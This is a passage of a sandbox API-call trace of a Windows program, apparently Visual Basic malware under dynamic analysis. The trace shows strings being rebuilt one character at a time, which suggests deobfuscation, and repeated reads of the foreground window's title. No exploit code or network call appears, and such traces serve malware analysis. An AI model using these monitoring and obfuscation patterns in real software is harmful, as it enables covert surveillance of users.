(in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.352] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.352] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.353] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.353] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.354] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.354] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.355] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.355] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.356] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.356] GetForegroundWindow () returned 0x10162 [0177.356] GetLastError () returned 0x0 [0177.356] SysStringLen (param_1=" ") returned 0xff [0177.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0177.425] SysStringLen (param_1=" ") returned 0xff [0177.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0177.425] GetWindowTextA (in: hWnd=0x10162, lpString=0x11644c4, nMaxCount=255 | out: lpString="Blank Page - Windows Internet Explorer") returned 38 [0177.426] GetLastError () returned 0x0 [0177.426] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0177.426] SysStringByteLen (bstr="求湡慐敧ⴠ圠湩潤獷䤠瑮牥敮⁴硅汰牯牥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 256 [0177.427] SysStringLen (param_1="Blank Page - Windows Internet Explorer") returned 0x27 [0177.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Blank Page - Windows Internet Explorer", cchWideChar=40, lpMultiByteStr=0x1168f7c, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Blank Page - Windows Internet Explorer", lpUsedDefaultChar=0x0) returned 40 [0177.427] SetWindowTextA (hWnd=0x103c4, lpString="Blank Page - Windows Internet Explorer") returned 1 [0177.427] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0177.427] GetFocus () returned 0x0 [0177.428] lstrlenA (lpString="Blank Page - Windows Internet Explorer") returned 38 [0177.428] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1168f7c) returned 0x1 [0177.428] IsWindow (hWnd=0x103c4) returned 1 [0177.428] IsWindow (hWnd=0x103c4) returned 1 [0177.429] IsWindow (hWnd=0x103c4) returned 1 [0177.429] IsWindow (hWnd=0x103c4) returned 1 [0177.429] GetFocus () returned 0x0 [0177.429] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x26 [0177.429] GetFocus () returned 0x0 [0177.430] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x27) returned 0x10ebcd0 [0177.430] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x27, lParam=0x10ebcd0) returned 0x26 [0177.430] GetFocus () returned 0x0 [0177.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0177.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Blank Page - Windows Internet Explorer", cbMultiByte=-1, lpWideCharStr=0x1168f7c, cchWideChar=39 | out: lpWideCharStr="Blank Page - Windows Internet Explorer") returned 39 [0177.430] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0177.430] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0177.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.432] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0177.432] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.432] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0177.433] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.433] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0177.434] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.434] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0177.439] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.440] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0177.440] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.441] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0177.441] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.442] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0177.442] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.443] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0177.443] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.444] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.444] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.445] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0177.445] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.446] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0177.446] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.447] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0177.447] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.447] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0177.448] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.448] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.449] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.449] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.449] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.454] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0177.454] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.455] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.455] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.456] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.456] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.457] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0177.457] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.458] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.458] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.459] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0177.459] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.459] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0177.460] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.460] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0177.461] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.461] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.461] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0177.462] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0177.462] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0177.463] GetForegroundWindow () returned 0x1011a [0177.463] GetLastError () returned 0x0 [0177.463] SysStringLen (param_1=" ") returned 0xff [0177.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0177.463] SysStringLen (param_1=" ") returned 0xff [0177.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0177.463] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0177.464] GetLastError () returned 0x0 [0177.464] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0177.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 